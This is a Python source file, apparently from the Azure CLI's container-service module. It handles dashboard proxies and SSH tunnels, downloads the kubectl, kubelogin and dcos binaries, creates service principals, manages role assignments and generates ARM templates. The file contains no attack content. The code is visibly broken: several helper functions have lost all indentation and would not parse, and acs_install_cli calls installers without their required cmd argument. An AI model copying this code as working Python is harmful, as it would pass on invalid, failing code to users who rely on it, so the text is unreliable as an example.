        return _dcos_browse_internal(acs_info, disable_browser, ssh_key_file)
    raise CLIError('Unsupported orchestrator type {} for browse'.format(orchestrator_type))
def k8s_browse(cmd, client, name, resource_group_name, disable_browser=False, ssh_key_file=None):
    """
    Launch a proxy and browse the Kubernetes web UI.

    :param disable_browser: If true, don't launch a web browser after estabilishing the proxy
    :type disable_browser: bool
    """
    cluster_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
    _k8s_browse_internal(name, cluster_info, disable_browser, ssh_key_file)
def _k8s_browse_internal(name, acs_info, disable_browser, ssh_key_file):
    """Fetch cluster credentials, run `kubectl proxy`, and optionally open the UI."""
    if not which('kubectl'):
        raise CLIError('Can not find kubectl executable in PATH')
    kubeconfig_path = os.path.join(get_config_dir(), 'acsBrowseConfig.yaml')
    # Always start from fresh credentials.
    if os.path.exists(kubeconfig_path):
        os.remove(kubeconfig_path)
    _k8s_get_credentials_internal(name, acs_info, kubeconfig_path, ssh_key_file, False)

    logger.warning('Proxy running on 127.0.0.1:8001/ui')
    logger.warning('Press CTRL+C to close the tunnel...')
    if not disable_browser:
        wait_then_open_async('http://127.0.0.1:8001/ui')
    # Blocks until the user interrupts the proxy.
    subprocess.call(["kubectl", "--kubeconfig", kubeconfig_path, "proxy"])
def dcos_browse(cmd, client, name, resource_group_name, disable_browser=False, ssh_key_file=None):
    """
    Creates an SSH tunnel to the Azure container service, and opens the Mesosphere DC/OS dashboard in the browser.

    :param name: name: Name of the target Azure container service instance.
    :type name: String
    :param resource_group_name: Name of Azure container service's resource group.
    :type resource_group_name: String
    :param disable_browser: If true, don't launch a web browser after estabilishing the proxy
    :type disable_browser: bool
    :param ssh_key_file: Path to the SSH key to use
    :type ssh_key_file: string
    """
    cluster_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
    _dcos_browse_internal(cluster_info, disable_browser, ssh_key_file)
def _dcos_browse_internal(acs_info, disable_browser, ssh_key_file):
    """SSH into the cluster, start its octarine proxy, tunnel it to a local
    port, and open the DC/OS dashboard through that tunnel."""
    if not os.path.isfile(ssh_key_file):
        raise CLIError('Private key file {} does not exist'.format(ssh_key_file))

    acs = acs_client.ACSClient()
    if not acs.connect(_get_host_name(acs_info), _get_username(acs_info),
                       key_filename=ssh_key_file):
        raise CLIError('Error connecting to ACS: {}'.format(_get_host_name(acs_info)))

    octarine_bin = '/opt/mesosphere/bin/octarine'
    if not acs.file_exists(octarine_bin):
        raise CLIError('Proxy server ({}) does not exist on the cluster.'.format(octarine_bin))

    # Launch the remote proxy under a random id so concurrent sessions
    # cannot collide.
    proxy_id = _rand_str(16)
    proxy_cmd = '{} {}'.format(octarine_bin, proxy_id)
    acs.run(proxy_cmd, background=True)

    # Parse the output to get the remote PORT
    proxy_client_cmd = '{} --client --port {}'.format(octarine_bin, proxy_id)
    stdout, _ = acs.run(proxy_client_cmd)
    remote_port = int(stdout.read().decode().strip())
    local_port = acs.get_available_local_port()

    # Set the proxy
    proxy.set_http_proxy('127.0.0.1', local_port)
    logger.warning('Proxy running on 127.0.0.1:%s', local_port)
    logger.warning('Press CTRL+C to close the tunnel...')
    if not disable_browser:
        wait_then_open_async('http://127.0.0.1')
    try:
        # Blocks until interrupted; the finally clause guarantees the system
        # HTTP proxy setting is cleared afterwards.
        acs.create_tunnel(
            remote_host='127.0.0.1',
            remote_port=remote_port,
            local_port=local_port)
    finally:
        proxy.disable_http_proxy()
def acs_install_cli(cmd, client, resource_group_name, name, install_location=None, client_version=None):
    """Install the client CLI matching the cluster's orchestrator (kubectl or dcos)."""
    acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
    orchestrator_type = acs_info.orchestrator_profile.orchestrator_type  # pylint: disable=no-member
    kwargs = {'install_location': install_location}
    if client_version:
        kwargs['client_version'] = client_version
    # Dispatch on the orchestrator type; unknown types are an error.
    installers = {
        'kubernetes': k8s_install_cli,
        'dcos': dcos_install_cli,
    }
    installer = installers.get(orchestrator_type)
    if installer is None:
        raise CLIError('Unsupported orchestrator type {} for install-cli'.format(orchestrator_type))
    return installer(**kwargs)
def _ssl_context():
    """Build an SSL context, with a fallback for old Pythons and Cloud Shell on Windows."""
    needs_legacy_context = sys.version_info < (3, 4) or (in_cloud_console() and platform.system() == 'Windows')
    if needs_legacy_context:
        try:
            return ssl.SSLContext(ssl.PROTOCOL_TLS)  # added in python 2.7.13 and 3.6
        except AttributeError:
            # Very old runtimes predate PROTOCOL_TLS.
            return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
    return ssl.create_default_context()
def _urlretrieve(url, filename):
    """Download *url* and write the response body to *filename*."""
    response = urlopen(url, context=_ssl_context())
    with open(filename, "wb") as out_file:
        out_file.write(response.read())
def _unzip(src, dest):
    """Extract the zip archive *src* into the directory *dest*."""
    logger.debug('Extracting %s to %s.', src, dest)
    if platform.system() not in ('Linux', 'Darwin', 'Windows'):
        raise CLIError('The current system is not supported.')
    import zipfile
    with zipfile.ZipFile(src, 'r') as archive:
        archive.extractall(dest)
def dcos_install_cli(cmd, install_location=None, client_version='1.8'):
    """
    Downloads the dcos command line from Mesosphere

    :param install_location: Full path (including file name) to write the binary to.
    :param client_version: DC/OS CLI version to download, e.g. '1.8'.
    """
    system = platform.system()
    if not install_location:
        raise CLIError(
            "No install location specified and it could not be determined from the current platform '{}'".format(
                system))
    base_url = 'https://downloads.dcos.io/binaries/cli/{}/x86-64/dcos-{}/{}'
    if system == 'Windows':
        file_url = base_url.format('windows', client_version, 'dcos.exe')
    elif system == 'Linux':
        # TODO Support ARM CPU here
        file_url = base_url.format('linux', client_version, 'dcos')
    elif system == 'Darwin':
        file_url = base_url.format('darwin', client_version, 'dcos')
    else:
        # Fixed: this message was copy-pasted from the octarine proxy check and
        # did not describe the actual failure (unsupported platform).
        raise CLIError('The current platform ({}) is not supported.'.format(system))
    logger.warning('Downloading client to %s', install_location)
    try:
        _urlretrieve(file_url, install_location)
        # Add execute permission for owner/group/other, preserving existing mode bits.
        os.chmod(install_location,
                 os.stat(install_location).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
    except IOError as err:
        raise CLIError('Connection error while attempting to download client ({})'.format(err))
def k8s_install_cli(cmd, client_version='latest', install_location=None,
                    kubelogin_version='latest', kubelogin_install_location=None):
    """Install kubectl and the kubelogin credential plugin.

    :param client_version: kubectl version to install ('latest' resolves the stable release).
    :param install_location: Full path (including file name) for the kubectl binary.
    :param kubelogin_version: kubelogin version to install ('latest' resolves the newest release).
    :param kubelogin_install_location: Full path (including file name) for the kubelogin binary.
    """
    k8s_install_kubectl(cmd, client_version, install_location)
    k8s_install_kubelogin(cmd, kubelogin_version, kubelogin_install_location)
def k8s_install_kubectl(cmd, client_version='latest', install_location=None):
    """
    Install kubectl, a command-line interface for Kubernetes clusters.

    :param client_version: kubectl release to install ('latest' resolves via stable.txt).
    :param install_location: Full path (including file name) to write the binary to.
    """
    source_url = "https://storage.googleapis.com/kubernetes-release/release"
    cloud_name = cmd.cli_ctx.cloud.name
    if cloud_name.lower() == 'azurechinacloud':
        source_url = 'https://mirror.azure.cn/kubernetes/kubectl'
    if client_version == 'latest':
        context = _ssl_context()
        version = urlopen(source_url + '/stable.txt', context=context).read()
        client_version = version.decode('UTF-8').strip()
    else:
        client_version = "v%s" % client_version
    system = platform.system()
    base_url = source_url + '/{}/bin/{}/amd64/{}'
    # ensure installation directory exists
    install_dir, cli = os.path.dirname(install_location), os.path.basename(install_location)
    if not os.path.exists(install_dir):
        os.makedirs(install_dir)
    if system == 'Windows':
        file_url = base_url.format(client_version, 'windows', 'kubectl.exe')
    elif system == 'Linux':
        # TODO: Support ARM CPU here
        file_url = base_url.format(client_version, 'linux', 'kubectl')
    elif system == 'Darwin':
        file_url = base_url.format(client_version, 'darwin', 'kubectl')
    else:
        # Fixed: this message was copy-pasted from the DC/OS proxy check and
        # did not describe the actual failure (unsupported platform).
        raise CLIError('The current platform ({}) is not supported.'.format(system))
    logger.warning('Downloading client to "%s" from "%s"', install_location, file_url)
    try:
        _urlretrieve(file_url, install_location)
        # Add execute permission for owner/group/other, preserving existing mode bits.
        os.chmod(install_location,
                 os.stat(install_location).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
    except IOError as ex:
        raise CLIError('Connection error while attempting to download client ({})'.format(ex))
    if system == 'Windows':  # be verbose, as the install_location likely not in Windows's search PATHs
        env_paths = os.environ['PATH'].split(';')
        found = next((x for x in env_paths if x.lower().rstrip('\\') == install_dir.lower()), None)
        if not found:
            # pylint: disable=logging-format-interpolation
            logger.warning('Please add "{0}" to your search PATH so the `{1}` can be found. 2 options: \n'
                           ' 1. Run "set PATH=%PATH%;{0}" or "$env:path += \'{0}\'" for PowerShell. '
                           'This is good for the current command session.\n'
                           ' 2. Update system PATH environment variable by following '
                           '"Control Panel->System->Advanced->Environment Variables", and re-open the command window. '
                           'You only need to do it once'.format(install_dir, cli))
    else:
        logger.warning('Please ensure that %s is in your search PATH, so the `%s` command can be found.',
                       install_dir, cli)
def k8s_install_kubelogin(cmd, client_version='latest', install_location=None):
    """
    Install kubelogin, a client-go credential (exec) plugin implementing azure authentication.

    :param client_version: kubelogin release tag to install ('latest' resolves via the GitHub API).
    :param install_location: Full path (including file name) to write the binary to.
    """
    source_url = 'https://github.com/Azure/kubelogin/releases/download'
    cloud_name = cmd.cli_ctx.cloud.name
    if cloud_name.lower() == 'azurechinacloud':
        source_url = 'https://mirror.azure.cn/kubernetes/kubelogin'
    if client_version == 'latest':
        context = _ssl_context()
        latest_release_url = 'https://api.github.com/repos/Azure/kubelogin/releases/latest'
        if cloud_name.lower() == 'azurechinacloud':
            latest_release_url = 'https://mirror.azure.cn/kubernetes/kubelogin/latest'
        latest_release = urlopen(latest_release_url, context=context).read()
        client_version = json.loads(latest_release)['tag_name'].strip()
    else:
        client_version = "v%s" % client_version
    base_url = source_url + '/{}/kubelogin.zip'
    file_url = base_url.format(client_version)
    # ensure installation directory exists
    install_dir, cli = os.path.dirname(install_location), os.path.basename(install_location)
    if not os.path.exists(install_dir):
        os.makedirs(install_dir)
    system = platform.system()
    if system == 'Windows':
        sub_dir, binary_name = 'windows_amd64', 'kubelogin.exe'
    elif system == 'Linux':
        # TODO: Support ARM CPU here
        sub_dir, binary_name = 'linux_amd64', 'kubelogin'
    elif system == 'Darwin':
        sub_dir, binary_name = 'darwin_amd64', 'kubelogin'
    else:
        # Fixed: this message was copy-pasted from the DC/OS proxy check and
        # did not describe the actual failure (unsupported platform).
        raise CLIError('The current platform ({}) is not supported.'.format(system))
    with tempfile.TemporaryDirectory() as tmp_dir:
        try:
            download_path = os.path.join(tmp_dir, 'kubelogin.zip')
            logger.warning('Downloading client to "%s" from "%s"', download_path, file_url)
            _urlretrieve(file_url, download_path)
        except IOError as ex:
            raise CLIError('Connection error while attempting to download client ({})'.format(ex))
        _unzip(download_path, tmp_dir)
        download_path = os.path.join(tmp_dir, 'bin', sub_dir, binary_name)
        shutil.move(download_path, install_location)
        # Add execute permission for owner/group/other, preserving existing mode bits.
        os.chmod(install_location, os.stat(install_location).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
    if system == 'Windows':  # be verbose, as the install_location likely not in Windows's search PATHs
        env_paths = os.environ['PATH'].split(';')
        found = next((x for x in env_paths if x.lower().rstrip('\\') == install_dir.lower()), None)
        if not found:
            # pylint: disable=logging-format-interpolation
            logger.warning('Please add "{0}" to your search PATH so the `{1}` can be found. 2 options: \n'
                           ' 1. Run "set PATH=%PATH%;{0}" or "$env:path += \'{0}\'" for PowerShell. '
                           'This is good for the current command session.\n'
                           ' 2. Update system PATH environment variable by following '
                           '"Control Panel->System->Advanced->Environment Variables", and re-open the command window. '
                           'You only need to do it once'.format(install_dir, cli))
    else:
        logger.warning('Please ensure that %s is in your search PATH, so the `%s` command can be found.',
                       install_dir, cli)
def _build_service_principal(rbac_client, cli_ctx, name, url, client_secret):
    """Create an AAD application and a service principal for the cluster.

    Returns a tuple of (service principal app id, aad session key); the first
    element is False when the principal could not be created within 10 retries.
    """
    # use get_progress_controller
    hook = cli_ctx.get_progress_controller(True)
    # Fixed typo: the keyword argument was previously misspelled 'messsage',
    # so the initial progress message was silently dropped.
    hook.add(message='Creating service principal', value=0, total_val=1.0)
    logger.info('Creating service principal')
    # always create application with 5 years expiration
    start_date = datetime.datetime.utcnow()
    end_date = start_date + relativedelta(years=5)
    result, aad_session_key = create_application(rbac_client.applications, name, url, [url], password=client_secret,
                                                 start_date=start_date, end_date=end_date)
    service_principal = result.app_id  # pylint: disable=no-member
    # AAD replication can lag behind the application creation, so retry with
    # a progressively longer back-off.
    for x in range(0, 10):
        hook.add(message='Creating service principal', value=0.1 * x, total_val=1.0)
        try:
            create_service_principal(cli_ctx, service_principal, rbac_client=rbac_client)
            break
        # TODO figure out what exception AAD throws here sometimes.
        except Exception as ex:  # pylint: disable=broad-except
            logger.info(ex)
            time.sleep(2 + 2 * x)
    else:
        return False, aad_session_key
    hook.add(message='Finished service principal creation', value=1.0, total_val=1.0)
    logger.info('Finished service principal creation')
    return service_principal, aad_session_key
def _add_role_assignment(cli_ctx, role, service_principal_msi_id, is_service_principal=True, delay=2, scope=None):
    """Create a role assignment, retrying while AAD propagates the principal.

    Returns True on success (or when the assignment already exists), False
    when every retry failed.
    """
    # AAD can have delays in propagating data, so sleep and retry
    hook = cli_ctx.get_progress_controller(True)
    hook.add(message='Waiting for AAD role to propagate', value=0, total_val=1.0)
    logger.info('Waiting for AAD role to propagate')
    assigned = False
    for attempt in range(10):
        hook.add(message='Waiting for AAD role to propagate', value=0.1 * attempt, total_val=1.0)
        try:
            # TODO: break this out into a shared utility library
            create_role_assignment(cli_ctx, role, service_principal_msi_id, is_service_principal, scope=scope)
            assigned = True
            break
        except CloudError as ex:
            if ex.message == 'The role assignment already exists.':
                assigned = True
                break
            logger.info(ex.message)
        except:  # pylint: disable=bare-except
            pass
        # Progressive back-off between attempts.
        time.sleep(delay + delay * attempt)
    if not assigned:
        return False
    hook.add(message='AAD role propagation done', value=1.0, total_val=1.0)
    logger.info('AAD role propagation done')
    return True
def delete_role_assignments(cli_ctx, ids=None, assignee=None, role=None, resource_group_name=None,
                            scope=None, include_inherited=False, yes=None):
    """Delete role assignments, either by explicit ids or by assignee/role/scope filters.

    When no filter at all is supplied, asks for confirmation (unless *yes* is
    truthy) before deleting every assignment under the subscription.
    """
    factory = get_auth_management_client(cli_ctx, scope)
    assignments_client = factory.role_assignments
    definitions_client = factory.role_definitions
    ids = ids or []
    if ids:
        # Explicit assignment ids are exclusive with every other filter.
        if assignee or role or resource_group_name or scope or include_inherited:
            raise CLIError('When assignment ids are used, other parameter values are not required')
        for i in ids:
            assignments_client.delete_by_id(i)
        return
    # Fixed: 'assignee' was previously listed twice in this check.
    if not any([ids, assignee, role, resource_group_name, scope, yes]):
        msg = 'This will delete all role assignments under the subscription. Are you sure?'
        if not prompt_y_n(msg, default="n"):
            return
    scope = _build_role_scope(resource_group_name, scope,
                              assignments_client.config.subscription_id)
    assignments = _search_role_assignments(cli_ctx, assignments_client, definitions_client,
                                           scope, assignee, role, include_inherited,
                                           include_groups=False)
    if assignments:
        for a in assignments:
            assignments_client.delete_by_id(a.id)
def _delete_role_assignments(cli_ctx, role, service_principal, delay=2, scope=None):
    """Delete a role assignment, retrying while AAD propagates the change.

    Returns True on success, False when every retry failed. CLIErrors are
    user-facing and propagate immediately.
    """
    # AAD can have delays in propagating data, so sleep and retry
    hook = cli_ctx.get_progress_controller(True)
    hook.add(message='Waiting for AAD role to delete', value=0, total_val=1.0)
    logger.info('Waiting for AAD role to delete')
    deleted = False
    for attempt in range(10):
        hook.add(message='Waiting for AAD role to delete', value=0.1 * attempt, total_val=1.0)
        try:
            delete_role_assignments(cli_ctx,
                                    role=role,
                                    assignee=service_principal,
                                    scope=scope)
            deleted = True
            break
        except CLIError as ex:
            raise ex
        except CloudError as ex:
            logger.info(ex)
        # Progressive back-off between attempts.
        time.sleep(delay + delay * attempt)
    if not deleted:
        return False
    hook.add(message='AAD role deletion done', value=1.0, total_val=1.0)
    logger.info('AAD role deletion done')
    return True
def _search_role_assignments(cli_ctx, assignments_client, definitions_client,
                             scope, assignee, role, include_inherited, include_groups):
    """List role assignments matching the given scope/assignee/role filters.

    :param include_inherited: also keep assignments inherited from parent scopes.
    :param include_groups: use AAD's "assignedTo" filter so assignments made to
        groups the assignee belongs to are returned as well.
    """
    assignee_object_id = None
    if assignee:
        assignee_object_id = _resolve_object_id(cli_ctx, assignee)
    # always use "scope" if provided, so we can get assignments beyond subscription e.g. management groups
    if scope:
        assignments = list(assignments_client.list_for_scope(
            scope=scope, filter='atScope()'))
    elif assignee_object_id:
        if include_groups:
            f = "assignedTo('{}')".format(assignee_object_id)
        else:
            f = "principalId eq '{}'".format(assignee_object_id)
        assignments = list(assignments_client.list(filter=f))
    else:
        assignments = list(assignments_client.list())
    if assignments:
        # Keep assignments at the requested scope; with include_inherited also
        # keep ancestors.
        # NOTE(review): re.match treats the ASSIGNMENT's scope as the regex
        # pattern applied to the requested scope — effectively a prefix match;
        # confirm special regex characters in scopes cannot occur here.
        assignments = [a for a in assignments if (
            not scope or
            include_inherited and re.match(_get_role_property(a, 'scope'), scope, re.I) or
            _get_role_property(a, 'scope').lower() == scope.lower()
        )]
        if role:
            role_id = _resolve_role_id(role, scope, definitions_client)
            assignments = [i for i in assignments if _get_role_property(
                i, 'role_definition_id') == role_id]
        if assignee_object_id:
            # list_for_scope has no principal filter, so narrow client-side.
            assignments = [i for i in assignments if _get_role_property(
                i, 'principal_id') == assignee_object_id]
    return assignments
def _get_role_property(obj, property_name):
if isinstance(obj, dict):
return obj[property_name]
return getattr(obj, property_name)
def _get_default_dns_prefix(name, resource_group_name, subscription_id):
# Use subscription id to provide uniqueness and prevent DNS name clashes
name_part = re.sub('[^A-Za-z0-9-]', '', name)[0:10]
if not name_part[0].isalpha():
name_part = (str('a') + name_part)[0:10]
resource_group_part = re.sub('[^A-Za-z0-9-]', '', resource_group_name)[0:16]
return '{}-{}-{}'.format(name_part, resource_group_part, subscription_id[0:6])
def list_acs_locations(cmd, client):
    """Return the Azure regions where ACS is available, split by rollout stage."""
    return {
        "productionRegions": regions_in_prod,
        "previewRegions": regions_in_preview
    }
def _generate_windows_profile(windows, admin_username, admin_password):
if windows:
if not admin_password:
raise CLIError('--admin-password is required.')
if len(admin_password) < 6:
raise CLIError('--admin-password must be at least 6 characters')
windows_profile = {
"adminUsername": admin_username,
"adminPassword": admin_password,
}
return windows_profile
return None
def _generate_master_pool_profile(api_version, master_profile, master_count, dns_name_prefix,
master_vm_size, master_osdisk_size, master_vnet_subnet_id,
master_first_consecutive_static_ip, master_storage_profile):
master_pool_profile = {}
default_master_pool_profile = {
"count": int(master_count),
"dnsPrefix": dns_name_prefix + 'mgmt',
}
if api_version == "2017-07-01":
default_master_pool_profile = _update_dict(default_master_pool_profile, {
"count": int(master_count),
"dnsPrefix": dns_name_prefix + 'mgmt',
"vmSize": master_vm_size,
"osDiskSizeGB": int(master_osdisk_size),
"vnetSubnetID": master_vnet_subnet_id,
"firstConsecutiveStaticIP": master_first_consecutive_static_ip,
"storageProfile": master_storage_profile,
})
if not master_profile:
master_pool_profile = default_master_pool_profile
else:
master_pool_profile = _update_dict(default_master_pool_profile, master_profile)
return master_pool_profile
def _generate_agent_pool_profiles(api_version, agent_profiles, agent_count, dns_name_prefix,
                                  agent_vm_size, os_type, agent_osdisk_size, agent_vnet_subnet_id,
                                  agent_ports, agent_storage_profile):
    """Build the agentPoolProfiles list, merging any user-supplied overrides over the defaults."""
    default_agent_pool_profile = {
        "count": int(agent_count),
        "vmSize": agent_vm_size,
        "osType": os_type,
        "dnsPrefix": dns_name_prefix + 'agent',
    }
    if api_version == "2017-07-01":
        # The 2017-07-01 API surface exposes additional agent settings.
        default_agent_pool_profile = _update_dict(default_agent_pool_profile, {
            "count": int(agent_count),
            "vmSize": agent_vm_size,
            "osDiskSizeGB": int(agent_osdisk_size),
            "osType": os_type,
            "dnsPrefix": dns_name_prefix + 'agent',
            "vnetSubnetID": agent_vnet_subnet_id,
            "ports": agent_ports,
            "storageProfile": agent_storage_profile,
        })
    if agent_profiles is None:
        return [_update_dict(default_agent_pool_profile, {"name": "agentpool0"})]
    # override agentPoolProfiles by using the passed in agent_profiles;
    # honor a user-specified dnsPrefix, otherwise derive one from the index
    # to avoid duplicate DNS names.
    return [
        _update_dict(default_agent_pool_profile,
                     _update_dict({"dnsPrefix": dns_name_prefix + 'agent' + str(idx)}, ap))
        for idx, ap in enumerate(agent_profiles)
    ]
def _generate_outputs(name, orchestrator_type, admin_username):
# define outputs
outputs = {
"masterFQDN": {
"type": "string",
"value": "[reference(concat('Microsoft.ContainerService/containerServices/', '{}')).masterProfile.fqdn]".format(name) # pylint: disable=line-too-long
},
"sshMaster0": {
"type": "string",
"value": "[concat('ssh ', '{0}', '@', reference(concat('Microsoft.ContainerService/containerServices/', '{1}')).masterProfile.fqdn, ' -A -p 22')]".format(admin_username, name) # pylint: disable=line-too-long
},
}
if orchestrator_type.lower() != "kubernetes":
outputs["agentFQDN"] = {
"type": "string",
"value": "[reference(concat('Microsoft.ContainerService/containerServices/', '{}')).agentPoolProfiles[0].fqdn]".format(name) # pylint: disable=line-too-long
}
# override sshMaster0 for non-kubernetes scenarios
outputs["sshMaster0"] = {
"type": "string",
"value": "[concat('ssh ', '{0}', '@', reference(concat('Microsoft.ContainerService/containerServices/', '{1}')).masterProfile.fqdn, ' -A -p 2200')]".format(admin_username, name) # pylint: disable=line-too-long
}
return outputs
def _generate_properties(api_version, orchestrator_type, orchestrator_version, master_pool_profile,
agent_pool_profiles, ssh_key_value, admin_username, windows_profile):
properties = {
"orchestratorProfile": {
"orchestratorType": orchestrator_type,
},
"masterProfile": master_pool_profile,
"agentPoolProfiles": agent_pool_profiles,
"linuxProfile": {
"ssh": {
"publicKeys": [
{
"keyData": ssh_key_value
}
]
},
"adminUsername": admin_username
},
}
if api_version == "2017-07-01":
properties["orchestratorProfile"]["orchestratorVersion"] = orchestrator_version
if windows_profile is not None:
properties["windowsProfile"] = windows_profile
return properties
# pylint: disable=too-many-locals
def acs_create(cmd, client, resource_group_name, deployment_name, name, ssh_key_value, dns_name_prefix=None,
               location=None, admin_username="azureuser", api_version=None, master_profile=None,
               master_vm_size="Standard_D2_v2", master_osdisk_size=0, master_count=1, master_vnet_subnet_id="",
               master_first_consecutive_static_ip="10.240.255.5", master_storage_profile="",
               agent_profiles=None, agent_vm_size="Standard_D2_v2", agent_osdisk_size=0,
               agent_count=3, agent_vnet_subnet_id="", agent_ports=None, agent_storage_profile="",
               orchestrator_type="DCOS", orchestrator_version="", service_principal=None, client_secret=None, tags=None,
               windows=False, admin_password="", generate_ssh_keys=False,  # pylint: disable=unused-argument
               validate=False, no_wait=False):
    """Create a new Acs.
    :param resource_group_name: The name of the resource group. The name
    is case insensitive.
    :type resource_group_name: str
    :param deployment_name: The name of the deployment.
    :type deployment_name: str
    :param dns_name_prefix: Sets the Domain name prefix for the cluster.
    The concatenation of the domain name and the regionalized DNS zone
    make up the fully qualified domain name associated with the public
    IP address.
    :type dns_name_prefix: str
    :param name: Resource name for the container service.
    :type name: str
    :param ssh_key_value: Configure all linux machines with the SSH RSA
    public key string. Your key should include three parts, for example
    'ssh-rsa AAAAB...snip...UcyupgH azureuser@linuxvm'
    :type ssh_key_value: str
    :param content_version: If included it must match the ContentVersion
    in the template.
    :type content_version: str
    :param admin_username: User name for the Linux Virtual Machines.
    :type admin_username: str
    :param api_version: ACS API version to use
    :type api_version: str
    :param master_profile: MasterProfile used to describe master pool
    :type master_profile: dict
    :param master_vm_size: The size of master pool Virtual Machine
    :type master_vm_size: str
    :param master_osdisk_size: The osDisk size in GB of master pool Virtual Machine
    :type master_osdisk_size: int
    :param master_count: The number of masters for the cluster.
    :type master_count: int
    :param master_vnet_subnet_id: The vnet subnet id for master pool
    :type master_vnet_subnet_id: str
    :param master_storage_profile: The storage profile used for master pool.
    Possible value could be StorageAccount, ManagedDisk.
    :type master_storage_profile: str
    :param agent_profiles: AgentPoolProfiles used to describe agent pools
    :type agent_profiles: dict
    :param agent_vm_size: The size of the Virtual Machine.
    :type agent_vm_size: str
    :param agent_osdisk_size: The osDisk size in GB of agent pool Virtual Machine
    :type agent_osdisk_size: int
    :param agent_vnet_subnet_id: The vnet subnet id for master pool
    :type agent_vnet_subnet_id: str
    :param agent_ports: the ports exposed on the agent pool
    :type agent_ports: list
    :param agent_storage_profile: The storage profile used for agent pool.
    Possible value could be StorageAccount, ManagedDisk.
    :type agent_storage_profile: str
    :param location: Location for VM resources.
    :type location: str
    :param orchestrator_type: The type of orchestrator used to manage the
    applications on the cluster.
    :type orchestrator_type: str or :class:`orchestratorType
    <Default.models.orchestratorType>`
    :param tags: Tags object.
    :type tags: object
    :param windows: If true, the cluster will be built for running Windows container.
    :type windows: bool
    :param admin_password: The administration password for Windows nodes. Only available if --windows=true
    :type admin_password: str
    :param bool raw: returns the direct response alongside the
    deserialized response
    :rtype:
    :class:`AzureOperationPoller<msrestazure.azure_operation.AzureOperationPoller>`
    instance that returns :class:`DeploymentExtended
    <Default.models.DeploymentExtended>`
    :rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
    if raw=true
    :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
    """
    # Validate the public key up front so we fail before making any ARM calls.
    if ssh_key_value is not None and not is_valid_ssh_rsa_public_key(ssh_key_value):
        raise CLIError('Provided ssh key ({}) is invalid or non-existent'.format(ssh_key_value))
    subscription_id = get_subscription_id(cmd.cli_ctx)
    if not dns_name_prefix:
        dns_name_prefix = _get_default_dns_prefix(name, resource_group_name, subscription_id)
    rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
    if location is None:
        location = rg_location
    # if api-version is not specified, or specified in a version not supported
    # override based on location
    if api_version is None or api_version not in ["2017-01-31", "2017-07-01"]:
        if location in regions_in_preview:
            api_version = "2017-07-01"  # 2017-07-01 supported in the preview locations
        else:
            api_version = "2017-01-31"  # 2017-01-31 applied to other locations
    # Kubernetes needs a service principal for its Azure cloud-provider
    # integration; create or load one unless the caller supplied both parts.
    if orchestrator_type.lower() == 'kubernetes':
        principal_obj = _ensure_service_principal(cmd.cli_ctx, service_principal, client_secret, subscription_id,
                                                  dns_name_prefix, location, name)
        client_secret = principal_obj.get("client_secret")
        service_principal = principal_obj.get("service_principal")
    elif windows:
        raise CLIError('--windows is only supported for Kubernetes clusters')
    # set location if void
    if not location:
        location = '[resourceGroup().location]'
    # set os_type
    os_type = 'Linux'
    if windows:
        os_type = 'Windows'
    # set agent_ports if void
    if not agent_ports:
        agent_ports = []
    # get windows_profile
    windows_profile = _generate_windows_profile(windows, admin_username, admin_password)
    # The resources.properties fields should match with ContainerServices' api model
    master_pool_profile = _generate_master_pool_profile(api_version, master_profile, master_count, dns_name_prefix,
                                                       master_vm_size, master_osdisk_size, master_vnet_subnet_id,
                                                       master_first_consecutive_static_ip, master_storage_profile)
    agent_pool_profiles = _generate_agent_pool_profiles(api_version, agent_profiles, agent_count, dns_name_prefix,
                                                        agent_vm_size, os_type, agent_osdisk_size, agent_vnet_subnet_id,
                                                        agent_ports, agent_storage_profile)
    outputs = _generate_outputs(name, orchestrator_type, admin_username)
    properties = _generate_properties(api_version, orchestrator_type, orchestrator_version, master_pool_profile,
                                      agent_pool_profiles, ssh_key_value, admin_username, windows_profile)
    resource = {
        "apiVersion": api_version,
        "location": location,
        "type": "Microsoft.ContainerService/containerServices",
        "name": name,
        "tags": tags,
        "properties": properties,
    }
    template = {
        "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
        "contentVersion": "1.0.0.0",
        "resources": [
            resource,
        ],
        "outputs": outputs,
    }
    params = {}
    # Pass the client secret as a secureString template parameter so it is not
    # embedded in the template body itself.
    if service_principal is not None and client_secret is not None:
        properties["servicePrincipalProfile"] = {
            "clientId": service_principal,
            "secret": "[parameters('clientSecret')]",
        }
        template["parameters"] = {
            "clientSecret": {
                "type": "secureString",
                "metadata": {
                    "description": "The client secret for the service principal"
                }
            }
        }
        params = {
            "clientSecret": {
                "value": client_secret
            }
        }
    # Due to SPN replication latency, we do a few retries here
    max_retry = 30
    retry_exception = Exception(None)
    for _ in range(0, max_retry):
        try:
            return _invoke_deployment(cmd, resource_group_name, deployment_name,
                                      template, params, validate, no_wait)
        except CloudError as ex:
            retry_exception = ex
            # These messages indicate the SPN has not replicated yet; back off
            # and retry. Anything else is a genuine failure.
            if 'is not valid according to the validation procedure' in ex.message or \
               'The credentials in ServicePrincipalProfile were invalid' in ex.message or \
               'not found in Active Directory tenant' in ex.message:
                time.sleep(3)
            else:
                raise ex
    # All retries exhausted: surface the last CloudError we saw.
    raise retry_exception
def store_acs_service_principal(subscription_id, client_secret, service_principal,
                                file_name='acsServicePrincipal.json'):
    """Persist the service principal credentials for *subscription_id* in the config dir."""
    entry = {}
    if client_secret:
        entry['client_secret'] = client_secret
    if service_principal:
        entry['service_principal'] = service_principal
    config_path = os.path.join(get_config_dir(), file_name)
    full_config = load_service_principals(config_path=config_path) or {}
    full_config[subscription_id] = entry
    # Create/truncate with mode 0600 so the secret is readable only by the owner.
    fd = os.open(config_path, os.O_RDWR | os.O_CREAT | os.O_TRUNC, 0o600)
    with os.fdopen(fd, 'w+') as sp_file:
        json.dump(full_config, sp_file)
def load_acs_service_principal(subscription_id, file_name='acsServicePrincipal.json'):
    """Return the stored service principal entry for *subscription_id*, or None."""
    config_path = os.path.join(get_config_dir(), file_name)
    config = load_service_principals(config_path)
    return config.get(subscription_id) if config else None
